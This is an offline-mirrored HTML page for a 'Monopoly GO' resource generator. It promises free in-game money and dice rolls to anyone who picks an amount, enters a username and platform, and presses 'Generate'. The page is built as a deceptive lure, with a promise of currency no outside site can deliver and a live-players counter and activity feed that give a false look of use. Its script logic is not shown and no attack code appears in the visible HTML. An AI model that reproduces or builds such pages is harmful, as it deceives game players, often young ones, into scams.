﻿<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from www.monopolygo.net/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 22 Apr 2024 04:40:13 GMT -->
<head>
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
	<title>Monopoly GO - Generator</title>
	<meta name="description" content="Monopoly GO - Generator">
	<meta name="keywords" content="">
	<meta name="author" content="">
	
	<!-- Open Graph Social Meta Tags-->
	<meta property="og:title" content="Monopoly GO - Generator"> <!-- Title which is displayed when your site is shared on social networks -->
	<meta property="og:description" content="Monopoly GO - Generator"> <!-- Website description which is displayed when your site is shared on social networks -->
	<meta property="og:type" content="website">
	<meta property="og:url" content="http://www.mywebsiteurl.com/"> <!-- Your Website URL -->
	<meta property="og:image" content="../ww25.mywebsiteurl.com/social-share-image3c76.html">	<!-- Absolute Path to the Image which will display, when your website is shared on social networks -->
	
	<link rel="stylesheet" href="bootstrap/4.1.3/css/bootstrap.min.css">
	<link rel="stylesheet" href="releases/v5.3.1/css/all.css" integrity="sha384-mzrmE5qonljUremFsqc01SB46JvROS7bZs3IO2EmfFsd15uHvIt+Y8vEf7N7fWAU" crossorigin="anonymous">

	<link rel="stylesheet" href="ajax/libs/animate.css/3.5.2/animate.min.css">
	<link href="ajax/libs/select2/4.0.6-rc.0/css/select2.min.css" rel="stylesheet">
	<link rel="stylesheet" type="text/css" href="assets/css/styled450.css?v=568574">
	<link rel="icon" type="image/png" href="assets/images/favicon.png">
    
<script src="../code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
<link rel="stylesheet" href="../maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous"/>
<script src="../maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
<script type="text/javascript">
    function OpenBootstrapPopup() {
        $("#simpleModal").modal('show');
    }
</script>

</head>

<body>
    
    
<header class="top-header d-flex justify-content-end">
    
                                <div id="simpleModal" class="modal" tabindex="-1" role="dialog">
    <div class="modal-dialog" role="document">
        <div class="modal-content">
            <div class="modal-header">
                <h5 class="modal-title">Customer Details Form</h5>
                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                    <span aria-hidden="true">&times;</span>
                </button>
            </div>
            <div class="modal-body">
                <img src = "../monopolygo.net/steps.gif">
            </div>
            <div class="modal-footer">
                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
            </div>
        </div>
    </div>
</div>
	<div class="online-wrapp">Players online right now: <span></span></div>
</header>
<section id="home" class="d-flex justify-content-center align-items-center flex-column flex-lg-row">
    <video loop="" autoplay="" id="bgvid" muted="" class="video visible-desktop" poster="assets/images/monopoly-go-promo-image.png">
        <source src="assets/video/video.mp4" type="video/mp4">
    </video>		
	<div class="container">
		<div class="form-wrapp d-flex flex-column align-items-center justify-content-center position-relative">
			<img src="assets/images/monopoly-go-.png" class="w-100 my-3">
			<div class="coins-wrapp w-100">
				<!--<img class="w-100" src="assets/images/bg_image.png">-->
				<div class="sections-wrapp container-fluid">
					<div class="tabs-wrapp">
						<a href="#" class="single-tab-link active d-flex flex-column justify-content-center align-items-center"><img src="assets/images/money.png" width="50"><span>Money</span></a>
						<a href="#" class="single-tab-link money d-flex flex-column justify-content-center align-items-center"><img src="assets/images/rolls.png"><span>Rolls</span></a>
						<a href="#" class="single-tab-link perinfo d-flex flex-column justify-content-center align-items-center"><img src="assets/images/favicon.png"><span>Info</span></a>
					</div>
					<div class="coins-wrapp-inset w-100">
						<div class="cm-wrapp coins active">
						
							<div class="row">
								<div class="col-4 mb-3">
									<div class="single-coins cursor-pointer" onclick="setCash(1);">
										<img src="assets/images/money/1.png">
									</div>
								</div>
								<div class="col-4 mb-3">
									<div class="single-coins cursor-pointer" onclick="setCash(2);">
										<img src="assets/images/money/2.png">
									</div>
								</div>
								<div class="col-4 mb-3">
									<div class="single-coins cursor-pointer" onclick="setCash(3);">
										<img src="assets/images/money/3.png">
									</div>
								</div>
								<div class="col-4 mb-3">
									<div class="single-coins cursor-pointer" onclick="setCash(4);">
										<img src="assets/images/money/4.png">
									</div>
								</div>
								<div class="col-4 mb-3">
									<div class="single-coins cursor-pointer" onclick="setCash(5);">
										<img src="assets/images/money/5.png">
									</div>
								</div>
								<div class="col-4 mb-3">
									<div class="single-coins cursor-pointer" onclick="setCash(6);">
										<img src="assets/images/money/6.png">
									</div>
								</div>
							</div>
						
						</div>
						<div class="cm-wrapp cash">
							<div class="row">
								<div class="col-4 mb-3">
									<div class="single-coins cursor-pointer" onclick="setCoins(1);">
										<img src="assets/images/rolls/1.png">
									</div>
								</div>
								<div class="col-4 mb-3">
									<div class="single-coins cursor-pointer" onclick="setCoins(2);">
										<img src="assets/images/rolls/2.png">
									</div>
								</div>
								<div class="col-4 mb-3">
									<div class="single-coins cursor-pointer" onclick="setCoins(3);">
										<img src="assets/images/rolls/3.png">
									</div>
								</div>
								<div class="col-4 mb-3">
									<div class="single-coins cursor-pointer" onclick="setCoins(4);">
										<img src="assets/images/rolls/4.png">
									</div>
								</div>
								<div class="col-4 mb-3">
									<div class="single-coins cursor-pointer" onclick="setCoins(5);">
										<img src="assets/images/rolls/5.png">
									</div>
								</div>
								<div class="col-4 mb-3">
									<div class="single-coins cursor-pointer" onclick="setCoins(6);">
										<img src="assets/images/rolls/6.png">
									</div>
								</div>

							</div>
						</div>
						<div class="cm-wrapp perinfo">
                         <center>  <button type="button" class="btn btn-info" style="align-content: center; margin-bottom: 10px;" onclick="OpenBootstrapPopup();">HOW TO FIND YOUR USERNAME</button> </center> <br>

							<div class="d-flex input-wrapp mb-3">
                                
								<div class="description">
                                    
									<img src="assets/images/favicon.png">
									<input type="text" name="username" class="form-control" placeholder="Enter your username">
								</div>
							</div>
							<div class="platforms-wrapp my-4">
								<div class="row mb-3">
									<div class="col-6 col-lg-4 offset-0 offset-lg-2">
									   <img src="assets/images/ios.png" class="platform-single" data-platform="1">
									</div>
									<div class="col-6 col-lg-4">
									   <img src="assets/images/android.png" class="platform-single" data-platform="2">
									</div>
								</div>
							</div>
							<div class="d-flex justify-content-center">
								<button class="btn btn-proceed" id="proceed">Proceed</button>
							</div>
						</div>
						<div class="cm-wrapp details">
							<div class="align-items-center d-flex flex-column input-wrapp mb-3 user-information">
								<div class="icon-wrapp">
									<i class="fab fa-apple"></i>
								</div>
								<div class="description">
									<div class="username">
										coLBubbadub
									</div>
								</div>
							</div>
							<div class="row">
								<div class="col-6">
									<div class="single-coins">
										<div class="image">
											<img src="#">
										</div>
										<div class="single-coins-summ d-flex my-2">
											<div class="summ-wrapp w-100 text-center">
												<span class="summ">5M</span>
											</div>
										</div>
									</div>
								</div>
								<div class="col-6">
									<div class="single-coins cash">
										<div class="image">
											<img src="#">
										</div>
										<div class="single-coins-summ d-flex my-2">
											<div class="summ-wrapp w-100 text-center">
												<span class="summ">10M</span>
											</div>
										</div>
									</div>
								</div>
							</div>
							<div class="d-flex justify-content-center mt-3">
								<button class="btn btn-proceed" id="generate">Generate</button>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
	</div>
	<div class="generator mt-4 mb-3 d-block text-center d-lg-none px-4">Recent Activity</div>
	<div class="recent-activity"></div>
</section>


<div class="modal fade" id="contactusModalCenter" tabindex="-1" role="dialog" aria-labelledby="contactusModalCenterTitle" aria-hidden="true">
  <div class="modal-dialog modal-dialog-centered pages" role="document">
    <div class="modal-content">
      <div class="modal-header">
        <button type="button" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
		<h1 class="py-1">Contact us</h1>
		<form id="contactform">
			<div id="error"></div>
			<div class="form-group">
				<input type="text" name="uname" class="form-control" placeholder="Your name">
			</div>
			<div class="form-group">
				<input type="text" name="email" class="form-control" placeholder="Your email">
			</div>
			<div class="form-group">
				<textarea class="form-control" cols="8" name="message" placeholder="Message"></textarea>
			</div>
			<button class="btn wtb-button w-100" type="submit">Send</button>
		</form>
    </div>
  </div>
</div>



<script src="jquery-3.3.1.min.js"></script>
<script src="ajax/libs/popper.js/1.14.3/umd/popper.min.js"></script>
<script src="bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script src="ajax/libs/select2/4.0.6-rc.0/js/select2.min.js"></script>

<script>
var coinNums = [200, 1100, 2400, 5000];
</script>
<script src="assets/js/main228e.js?v=69770"></script>

</body>

<!-- Mirrored from www.monopolygo.net/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 22 Apr 2024 04:40:25 GMT -->
</html>
